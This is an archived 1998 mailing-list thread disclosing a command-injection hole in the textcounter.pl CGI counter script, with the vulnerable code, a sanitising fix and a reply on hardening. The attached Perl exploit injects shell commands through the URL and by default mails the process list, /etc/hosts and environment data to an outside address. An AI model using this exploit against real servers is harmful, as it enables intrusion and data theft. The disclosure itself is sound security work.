[ http://www.rootshell.com/ ] Date: Wed, 24 Jun 1998 08:51:11 +0300 From: Doru Petrescu Subject: textcounter.pl SECURITY HOLE Hi, I've found a serious problem in textcounter.pl script that enable everybody to execute commands on your system with the same rights as the httpd daemon. Program was created by Matt Wright (mattw@worldwidemart.com) and has a "Last Modified Date" at 5/10/96. You can find it at http://www.worldwidemart.com/scripts/. The counter use the enviroment variable DOCUMENT_URI to create/read/update a file where it keeps the hit count. There is NO test for shell metacharacters, so you can easily put something evil, that will make PERL to execute it ... This is the two lines responsible with the problem ... if (-e "$data_dir$count_page") { open(COUNT,"$data_dir$count_page"); .... } Because of the test condition, the attack have to be repeated twice to succeed. First time the condition is false and the tricky file gets created, and the second time, the condition is true and our commands get executed ... Nice isn't it ? :( The fix is very simple: add after line 91, another line that will make sure that there is NO tricky characters in the filename. $count_page = "$ENV{'DOCUMENT_URI'}"; # the original 91 line .... $count_page =~ s/([^a-z0-9])/sprintf("%%%02X",$1)/ge; # ADD THIS !!!!! If you want to make sure that your system is vulnerable or not, you can use the small program that it's attached. No cracking please ... Best regards, ------ Doru Petrescu KappaNet - Software Engineer E-mail: pdoru@kappa.ro Exploit : -- cut here -- #!/usr/bin/perl $URL='http://dtp.kappa.ro/a/test.shtml'; # please _DO_ _modify_ this $EMAIL='pdoru@pop3.kappa.ro,root'; # please _DO_ _modify_ this if ($ARGV[0]) { $CMD=$ARGV[0]; }else{ $CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${EMAIL} -sanothere_one"; } $text="${URL}/;IFS=\8;${CMD};echo|"; $text =~ s/ /\$\{IFS\}/g; #print "$text\n"; system({"wget"} "wget", $text, "-O/dev/null"); system({"wget"} "wget", $text, "-O/dev/null"); #system({"lynx"} "lynx", $text); #system({"lynx"} "lynx", $text); # if you don't have "wget" # you can try with "Lynx" -- cut here -- ---------------------------------------------------------------------------- Date: Wed, 24 Jun 1998 03:35:57 -0400 From: Rich Lafferty Subject: Re: textcounter.pl SECURITY HOLE Quoting Doru Petrescu (pdoru@kappa.ro) from Wed, Jun 24, 1998 at 08:51:11AM +0300: > Hi, > > I've found a serious problem in textcounter.pl script that enable > everybody to execute commands on your system with the same rights as the > httpd daemon. Bah, that's what I get for writing things at 3:30 am. Regarding my previous post: Yes, this script's vulnerability allows execution of arbitrary commands. Part about 'same rights as http daemon' still implies poor configuration of httpd. Obviously, translate that to 'with the same rights as the user running this poorly-written prefabricated script' for a properly- configured httpd. Use cgiwrap. Don't run scripts from untrusted sources. Don't take candy from strangers. Breathe. -Rich -- Rich Lafferty -----------+------------------------------------------- Department of Sociology | "Theory means you have ideas; ideology McGill University | means ideas have you" -unknown anarchist lafferty@pobox.com ------+-------------------------------------[mcq]-